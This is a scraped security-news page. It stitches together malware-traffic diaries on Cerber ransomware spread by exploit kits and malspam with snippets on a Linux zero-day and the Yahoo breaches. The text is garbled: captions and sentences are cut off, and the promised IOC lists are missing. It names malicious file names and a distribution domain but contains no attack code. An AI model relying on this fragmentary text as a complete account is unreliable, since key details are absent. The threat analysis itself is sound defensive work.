Information Security News
One, if by land, and two, if by sea is a phrase used by American poet Henry Wadsworth Longfellow in his poem Paul Reveres Ride first published in 1861. Longfellows poem tells a somewhat fictionalized tale of Paul Revere in 1775 during the American revolution. If British troops came to attack by land, Paul would hang one lantern in a church tower as a signal light. If British troops came by sea, Paul would hang two lanterns.
Much like the British arriving by land or by sea, Cerber ransomware has two main routes from which to rob your critical data of its independence. The first and most widely-used route is through email or malicious spam (malspam). The second route is through exploit kits (EKs).
Am I comparing colonial era British troops to Cerber ransomware in our current cyber landscape? You bet I am! Is it an accurate comparison? Probably not!
Nonethless, when I think of Cerber, I often think One, if by email, Two, if by exploit kit.
Yesterdays diary reviewed Cerber through email, so Ive already hung that lantern. Today Ill hang another lantern as we look at examples of Cerber ransomware through EKs.
As Ive discussed before, EKs are merely a method to distribute malware. Criminal groups establish campaigns utilizing EKs to distribute their malware. I often see indicators of campaigns that use Magnitude EK or Rig EK to distribute Cerber ransomware.
In my lab environment, I generally dont generate much Magnitude EK. Why? Because Magnitude usually happens through a malvertising campaign, and thats quite difficult to replicate. By the time any particular malvertisements indicators are known, the criminals have moved to a new malvertisement.
Since early October 2016, Ive typically seen Cerber ransomware from the pseudoDarkleech campaign using Rig EK. PseudoDarkleech currently uses a variant of Rig EK that researcher Kafeine has designated as Rig-V, because its a vip version thats evolved from the old Rig EK.
EITest is another major campaign that utilizes EKs to distribute malware. Although EITest distributes a variety of malware, Ill occasionally see Cerber sent by this campaign.
On Thursday 2016-12-15, I generated two examples of EK-based campaigns delivering Cerber ransomware. One was from the pseudoDarkleech campaign, and the other was from EITest." />
Shown above: Flow chart for both infections.
Both pseudoDarkleech and EITest use legitimate websites to kick off an infection chain. These websites are compromised, and if conditions are right, pages from these compromised sites have injected script. The injected script generates an iframe with an EK landing page URL. Each campaign has distinct patterns of injected script." />
Shown above:" />
Shown above: EITest script pointing to Rig-V on 2016-12-15.
t the infection traffic in Wireshark, youll find Rig-V with different domain names, but the same IP address both times. For both infections, I could not reach the page for the Cerber decryption instructions. The server didn" />
Shown above:" />
Shown above: Second infection (EITest) Rig-V on 2016-12-15.
atterns for Rig-V and Cerber havent changed much since my previous diary covering the pseudoDarkleech campaign on 2016-10-14. Only the domains and IP addresses are different.
The infected Windows desktop
Below is an image of the desktop from an infected Windows host. These samples of Cerber dropped an image to the desktop along with an .hta file containing the decryption instructions." />
Shown above: My copies of poems by Henry Wadsworth Longfellow... All gone!
Indicators of Compromise (IOCs)
The following are IOCs for the infection traffic I generated:
The following are file hashes and other info for the Flash exploit and Cerber ransomware:
File description: Rig-V Flash exploit seen on 2016-12-15
File description: Cerber ransomware sent by Rig-V from the pseudoDarkleech campaign on 2016-12-15
File description: Cerber ransomware sent by Rig-V from the EITest campaign on 2016-12-15
Pcap and malware for this diary can be found here.
As always, properly-administered Windows hosts are not likely to be infected by pseudoDarkleech, EITest, and other campaigns. As long as your Windows host is up-to-date and fully patched, your risk is minimal. If you">Paul said to his friend,
And I on the opposite shore will be,
Ready to respond and spread the alarm
Through every IT department and server farm,
For the companys folk to be up and to arm." />
Shown above: What really happened with Paul the incident responder.
brad [at] malware-traffic-analysis.net
If you run a mainstream distribution of Linux on a desktop computer, there's a good chance security researcher Chris Evans can hijack it when you do nothing more than open or even browse a specially crafted music file. And in the event you're running Chrome on the just-released Fedora 25, his code-execution attack works as a classic drive-by.
The zero-day exploits, which Evans published on Tuesday, are the latest to challenge the popular conceit that Linux, at least in its desktop form, is more immune to the types of attacks that have felled Windows computers for more than a decade and have increasingly snared Macs in recent years.
While Evans' attacks won't work on most Linux servers, they will reliably compromise most desktop versions of Linux, which employees at Google, Facebook, and other security conscious companies often use in an attempt to avoid the pitfalls of Windows and Mac OS X. Three weeks ago, Evans released a separate Linux zero-day that had similarly dire consequences.
by Sean Gallagher
In October of 2013, as a result of documents leaked by Edward Snowden, we learned the National Security Agency tapped straight into the connections between data centers at Yahoo and Google as part of a program called MUSCULAR. A month later, Yahoo announced it would encrypt all of its internal networks between data centers and add Secure Socket Layer encryption and secure (HTTPS) Web connections to all its services.
That move, however, failed to prevent two major breaches of user data: a breach affecting user data from more than 500 million user accounts late in 2014 (revealed in September) and the breach revealed yesterday involving data from more than 1 billion accounts. The recent break took place in August of 2013—before the barn door was closed. In addition, Yahoo's chief information security officer, Bob Lord, said that the parties behind the 2014 breach had stolen some of Yahoo's code and used it to forge Web "cookies" that gave access to users' accounts without the need to use login credentials.
Evidence of the August 2013 breach was given to Yahoo by "law enforcement officials," according to Lord, but it was likely discovered by a security researcher watching for data on underground markets. That suggests the data was in circulation in underground marketplaces in one form or another and actively in use by Internet criminal rings for a variety of purposes. If that's the case, then practically all of Yahoo's users who set up accounts prior to 2013 may have had details from their accounts used in targeted attacks, attempts to gain access to other Web accounts and cloud services, or any number of other scams.
Last month on 2016-11-22, I saw 10 items of malicious spam (malspam) sent to my spam folder. The messages all had links to malware. Unfortunately, by the time I examined those emails, the links were no longer active. I sent a tweet about it and moved on to other things .
Flash forward to this week. On Tuesday 2016-12-13, @malwrhunterteam noticed the same type of malspam . I checked my spam folder and found another four similar messages. This time, the links were still active, and I generated a full chain of infection traffic. That wave of malspam distributed Cerber ransomware.
The very next day on Wednesday 2016-12-14, I noticed another two messages in my spam folder with the same characteristics using a different domain. This wave of malspam also distributed Cerber ransomware.
Todays diary looks at indicators from these three waves of malspam. Perhaps we can get a better idea of the actor behind this activity.
Chain of events
The four emails from 2016-12-13 have links that downloaded a .js file. In my lab environment, double-clicking the .js file downloaded and installed Cerber ransomware. The two emails from 2016-12-14 have a link for a Microsoft Word document. The Word document has a malicious macro." />
Shown above:" />
Shown above:" />
Shown above: Data on the malspam (part 2 of 2).
recipient email addresses in the malspam I received during all three waves:
Below are the subject lines I saw for each of the three waves:
For each wave I saw, the emails all came from the same mail server. These servers also hosted the malicious links within the malspam. The servers were:
Based on the domain names and IP addresses, the criminals likely abused commercially available services. Below is the registration info and date registered for each domain.
All domains used a privacy guard service for the registration info, and all domains used name servers from cloudflare.com. Below is information on the IP addresses hosting the malspam domains:
Links from the emails were unique for each email during the first two waves." />
Shown above: Links from the emails.
For details, see the spreadsheet available here.
In both waves I have traffic for, the same URL for the Cerber ransomware executable was generated, whether it was the .js file from 2016-12-13 or the .doc macro from 2016-12-14." />
Shown above:" />
Shown above: .doc macro from 2016-12-14 getting the Cerber executable.
mware was different each day, each with a different file hash, and each with different IP addresses and domains during the post-infection traffic." />
Shown above: Windows desktop from the 2016-12-13 infection.
Below are indicators of compromise (IOCs) for traffic generated from the 2016-12-13 wave of malspam:
Below are IOCs for traffic generated from the 2016-12-14 wave of malspam:
Below is information for the associated .js file, .doc file, and Cerber ransomware executables:
File name: Domain_Abuse_Report_Viewer.js
File description: Cerber downloaded by .js file from ggjghhfhfh.com on 2016-12-13
File name: Invoice_349KL.doc
File description: Cerber downloaded by Word macro from ggjghhfhfh.com on 2016-12-14
A copy of the infection traffic, associated emails, malware, and artifacts can be found here.
Other people have noticed these malspam runs, and theyve gotten some public attention through various blogs [3, 4, 5]. They never last long. I assume thats because the associated IOCs are reported fairly quickly, and the emails Ive seen always get flagged as spam.
Fortunately, best security practices will help prevent infections like the ones in todays diary. A good email filtering system, properly administered Windows hosts, and an educated workforce mean users are much less likely to be infected.
Nonetheless, I assume this activity is somehow profitable for the people behind it. The criminals must be having some sort of success with these Cerber ransomware malspam runs. Why else would it keep happening?
brad [at] malware-traffic-analysis.net